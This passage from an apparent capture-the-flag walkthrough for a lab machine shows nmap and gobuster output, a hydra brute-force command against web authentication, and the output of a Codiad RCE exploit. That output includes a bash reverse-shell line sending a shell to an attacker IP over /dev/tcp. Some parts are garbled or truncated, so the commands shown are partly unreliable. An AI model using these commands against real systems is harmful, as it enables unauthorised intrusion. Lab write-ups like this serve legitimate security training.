    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux protocol 2.0)
    | ssh-hostkey:
    |_smtp-commands: Couldn't establish connection on port 25
    |_finger: ERROR: Script execution failed (use -d to debug)
    80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
    |_ Supported Methods: POST OPTIONS HEAD GET
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    2121/tcp open ccproxy-ftp?
    No exact OS matches for host (If you know what OS is running on it, see ).

Analyzing the output, we find that only two ports are legitimate: 22 (ssh) and 80 (http).

Because we don't have ssh credentials yet, let's visit port 80 in our browser. We are welcomed with the Map of Hell by Botticelli, inspired by Dante's Divine Comedy. Nothing interesting can be found in the page source.

    gobuster dir -e -u -w /usr/share/wordlists/dirbuster/ -x.
    =
    Gobuster v3.0.1
    by OJ Reeves ) & Christian Mehlmauer )
    =
    Url:
    Threads: 10
    Wordlist: /usr/share/wordlists/dirbuster/
    Expanded: true
    Timeout: 10s
    =
    6 13:23:36 Starting gobuster
    =
    /index.html (Status: 200)
    /inferno (Status: 401)
    /server-status (Status: 403)

Navigating to /inferno, we are prompted to authenticate. We will try to brute force the authentication with hydra and a custom user list consisting of the following usernames:

    hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.241.114 -m /inferno http-get

After a few minutes a valid set of credentials is found.

    host: 10.10.241.114 login: admin password:

Using the obtained password along with the username for the required authentication redirects us to another login form, where we once again use the same credentials.

Searching for Codiad, we find that it is a web-based IDE framework. Proceed with searching for "codiad exploit". We found a GitHub repository with an RCE (Remote Code Execution) exploit for Codiad. This exploit lets us execute system commands on Codiad to get a reverse shell. Clone this repository with git clone and follow the instructions.

    Please execute the following command on your vps:
    echo 'bash -c "bash -i >/dev/tcp/10.9.149.180/1235 0>&1 2>&1"' | nc -lnvp 1234
    nc -lnvp 1235
    Please confirm that you have done the two command above
    y
    credentials (e.g., bad password), or your
    browser doesn't understand how to supply
    Apache/2.4.29 (Ubuntu) Server at 10.10.241.114 Port 80
    Login failed! Please check your username and password.